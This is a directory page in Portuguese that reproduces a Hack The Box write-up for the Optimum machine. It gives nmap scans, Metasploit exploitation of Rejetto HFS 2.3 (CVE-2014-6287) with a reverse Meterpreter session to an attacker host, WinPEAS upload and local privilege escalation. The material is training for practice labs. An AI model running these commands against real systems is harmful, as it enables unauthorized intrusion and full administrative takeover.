Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Optimum — Writeup da máquina Optimum do Hack The Box. Este passo a passo cobre a exploração do Rejetto HttpFileServer 2.3 (CVE-2014-6287) para obter acesso inicial, seguido de escalonamento de privilégios em um host Windows usando técnicas de enumeração e ferramentas de pós-exploração. | Kitploit
Ferramentas/GitHubGitHub/r3fr4kt/optimum
Escalada de PrivilégiosReconhecimentoScanners de VulnerabilidadesAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesPós-ExploraçãoTestes de PenetraçãoAprendizado e Educação
GitHubr3fr4kt/optimum
2há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Optimum

Writeup da máquina Optimum do Hack The Box. Este passo a passo cobre a exploração do Rejetto HttpFileServer 2.3 (CVE-2014-6287) para obter acesso inicial, seguido de escalonamento de privilégios em um host Windows usando técnicas de enumeração e ferramentas de pós-exploração.

Ver Repositório

Optimum


Optimum – Writeup do Hack The Box

Visão Geral

Nesta máquina, o objetivo é obter acesso inicial a um host Windows explorando um serviço web vulnerável e depois escalar privilégios para obter a flag de administrador.

O caminho de ataque envolveu:

  • Enumeração de serviços
  • Exploração do Rejetto HTTP File Server 2.3
  • Acesso inicial via Metasploit
  • Escalação de privilégio usando WinPEAS e módulos de pós-exploração do Metasploit

Reconhecimento

Começamos com uma varredura completa de portas TCP para identificar serviços expostos.

root@kitploit:~
nmap -Pn -n -p- --min-rate 5000 -T4 <TARGET_IP>

A varredura revela a porta 80 aberta.

Em seguida, realizamos uma varredura de serviço e versão.

root@kitploit:~
nmap -p80 -sSCV --min-rate 5000 -T4 <TARGET_IP>

O resultado identifica o seguinte serviço:

root@kitploit:~
HttpFileServer 2.3

Este serviço corresponde ao Rejetto HTTP File Server, um servidor web leve para compartilhamento de arquivos.


Identificação de Vulnerabilidade

Após pesquisar a versão detectada, descobrimos uma vulnerabilidade conhecida:

root@kitploit:~
CVE-2014-6287

Esta vulnerabilidade permite execução remota de código devido à sanitização inadequada de entrada.


Exploração

Para explorar a vulnerabilidade, usamos o Metasploit.

Inicie o Metasploit:

root@kitploit:~
msfconsole -q

Pesquise pelo módulo apropriado:

root@kitploit:~
search rejetto

Carregue o módulo de exploit:

root@kitploit:~
use exploit/windows/http/rejetto_hfs_exec

Configure as opções necessárias:

root@kitploit:~
set RHOSTS <TARGET_IP>
set RPORT <TARGET_PORT>
set LHOST <ATTACKER_IP>
set LPORT <ATTACKER_PORT>
run

Uma vez executado, o exploit fornece uma sessão Meterpreter na máquina alvo.


Acesso Inicial

Com a sessão Meterpreter obtida, navegamos pelo sistema de arquivos para recuperar a flag de usuário.

root@kitploit:~
cd
cat user.txt
whoami

A saída do comando mostra que estamos logados como:

root@kitploit:~
kostas

Como este usuário não possui privilégios administrativos, prosseguimos com a escalação de privilégio.


Enumeração para Escalação de Privilégio

Para identificar potenciais vetores de escalação de privilégio, fazemos upload do WinPEAS, uma ferramenta bem conhecida de enumeração para escalação de privilégio no Windows.

root@kitploit:~
upload /usr/share/peass/winpeas/winPEAS.exe C:\Users\kostas\Desktop\wp.exe

Em seguida, executamos:

root@kitploit:~
shell
.\wp.exe

A saída revela informações úteis, incluindo credenciais associadas ao usuário kostas.


Escalação de Privilégio

Após revisar possíveis vetores de escalação, usamos o módulo do Metasploit:

root@kitploit:~
local_exploit_suggester

Carregue o módulo:

root@kitploit:~
use post/multi/recon/local_exploit_suggester

Configure a sessão:

root@kitploit:~
set SESSION <SESSION_NUMBER>
run

Este módulo sugere possíveis exploits locais que podem ser usados para escalar privilégios.

Após escalar privilégios com sucesso, obtemos um shell com direitos administrativos.

Verificação:

root@kitploit:~
shell
whoami

Acesso de Administrador

Uma vez obtidos os privilégios administrativos, navegamos até o diretório do Administrador para recuperar a flag root.

root@kitploit:~
cd \Users\Administrator
dir
cd Desktop
dir
type root.txt

Principais Aprendizados

Esta máquina demonstra vários conceitos importantes de teste de penetração:

  • A enumeração de serviços adequada é fundamental para identificar software vulnerável.
  • Vulnerabilidades publicamente conhecidas como CVE-2014-6287 podem levar à execução remota de código imediata.
  • Ferramentas como WinPEAS ajudam a identificar oportunidades de escalação de privilégio em ambientes Windows.
  • Módulos de pós-exploração do Metasploit podem acelerar o processo de escalação de privilégio.
Baixar ferramenta